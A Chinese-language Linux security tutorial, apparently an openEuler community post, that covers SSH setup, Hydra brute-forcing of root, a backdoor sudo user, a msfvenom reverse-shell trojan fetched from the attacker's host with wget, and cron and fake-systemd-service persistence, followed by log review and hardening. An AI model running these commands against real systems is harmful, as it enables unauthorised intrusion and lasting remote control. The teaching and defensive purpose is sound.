前言

在网络安全领域,Linux 是服务器攻防的绝对主战场,全球超80%的服务器运行 Linux,掌握 Linux 安全攻防,是网安从业者的核心必备技能。本文基于实战课程,从 Linux 基础、SSH 攻防、木马入侵与权限维持、系统日志排查与安全加固,全流程讲解 Linux 网络安全核心技术,适合零基础入门与实战提升。


一、为什么Linux是网安实战核心?

  1. 市场占比绝对主导:全球80%以上服务器使用 Linux,攻击面广、实战价值极高

  2. 攻防场景更真实:企业服务器、云主机均以 Linux 为主,是黑客重点目标

  3. 安全可控性强:开源、轻量、稳定,适合长期不关机、高并发业务场景


二、Linux基础入门:发行版与核心结构

1. Linux起源与发行版

  • 1991年林纳斯·托瓦兹发布开源内核,全球开发者协作完善

  • 主流发行版

    • RedHat系列:RedHat、CentOS(企业服务器首选)

    • Debian系列:Ubuntu、Kali(桌面/网安渗透专用)

2. Linux核心目录与操作特点

  • 无C/D/E盘概念,一切皆文件

  • 常用操作:命令行主导,虚拟机推荐 Ubuntu + Kali 双环境


三、系统服务安全:SSH攻防实战

SSH 是 Linux 远程管理核心协议,也是黑客最常攻击的入口。

1. SSH安装与基础配置

# 切换root
sudo su
# 安装SSH
apt install openssh-server
# 编辑配置
nano /etc/ssh/sshd_config
# 关键配置
PermitRootLogin yes
PasswordAuthentication yes
# 重启服务
service ssh restart

2. SSH暴力破解(Hydra)

Kali 自带 Hydra,批量尝试密码字典爆破 SSH:

hydra -l root -P password.txt ssh://目标IP

3. 后门用户植入(权限维持)

# 创建用户并创建家目录
useradd -m test
passwd test
# 赋予sudo权限
nano /etc/sudoers
test ALL=(ALL:ALL) ALL

4. 用户与权限基础

  • UID规则:root=0,系统用户1-999,普通用户≥1000

  • 文件权限:r=4 w=2 x=1,chmod 755 为常用权限


四、木马入侵检测:长期控制技术

木马核心:伪装、隐蔽、长期控制,三步完成入侵:生成 → 监听 → 植入。

1. MSF生成Linux木马

msfconsole
msfvenom -p linux/x64/shell/reverse_tcp LHOST=攻击机IP LPORT=9999 -f elf -o shell.elf

2. MSF启动监听

use exploit/multi/handler
set payload linux/x64/shell/reverse_tcp
set lhost 攻击机IP
set lport 9999
run

3. 木马植入与执行

# 目标机下载
wget http://攻击机IP/shell.elf -O shell.elf
# 加执行权限
chmod +x shell.elf
# 运行
./shell.elf

4. 三种权限维持方式

  1. 计划任务(Cron)

crontab -l | { cat ; echo "* * * * * sleep 10s ; /root/shell.elf" ; } | crontab -
  1. 开机启动项/etc/init.d/

  2. 系统服务伪装(最强)

nano /etc/systemd/system/test.service
# 配置内容
[Unit]
Description=test
After=network.target
[Service]
Type=simple
ExecStart=/home/enjoy/shell.elf
Restart=always
[Install]
WantedBy=multi-user.target
​
# 加载并开机自启
systemctl daemon-reload
systemctl enable test.service
systemctl start test.service

五、安全防护与系统加固

1. 日志排查(服务器监控录像)

  • 系统日志:cat /var/log/syslog

  • 登录日志:cat /var/log/auth.log

  • 筛选SSH日志:

journalctl -u ssh | grep 'Failed password'
journalctl -u ssh | grep 'Accepted password'
  • 审计工具 auditd:

apt install auditd
auditctl -w /usr/sbin/useradd -p x -k useradd_exec
ausearch -k useradd_exec

2. 黑客痕迹重点排查

  • 账户:cat /etc/passwdawk -F: '$3==0{print $1}' /etc/passwd

  • 进程:ps -eftop

  • 端口:netstat -ntuss -ntap

  • 计划任务:crontab -l

  • 服务:systemctl list-unit-files --type=service

3. Linux系统加固(必做)

  1. 账户加固

# 禁止root远程登录
nano /etc/ssh/sshd_config
PermitRootLogin no
systemctl restart sshd
  1. 防火墙加固:限制端口与IP访问

  2. 系统更新

apt update && apt upgrade -y
  1. 关闭无用服务严格文件权限


六、总结

Linux 网络安全的核心是攻防对抗

  • 攻击方:找入口 → 拿权限 → 植后门 → 保权限

  • 防御方:查日志 → 清痕迹 → 堵漏洞 → 强加固

掌握本文内容,可快速具备 Linux 服务器安全攻防实战能力。

Logo

openEuler 是由开放原子开源基金会孵化的全场景开源操作系统项目,面向数字基础设施四大核心场景(服务器、云计算、边缘计算、嵌入式),全面支持 ARM、x86、RISC-V、loongArch、PowerPC、SW-64 等多样性计算架构

更多推荐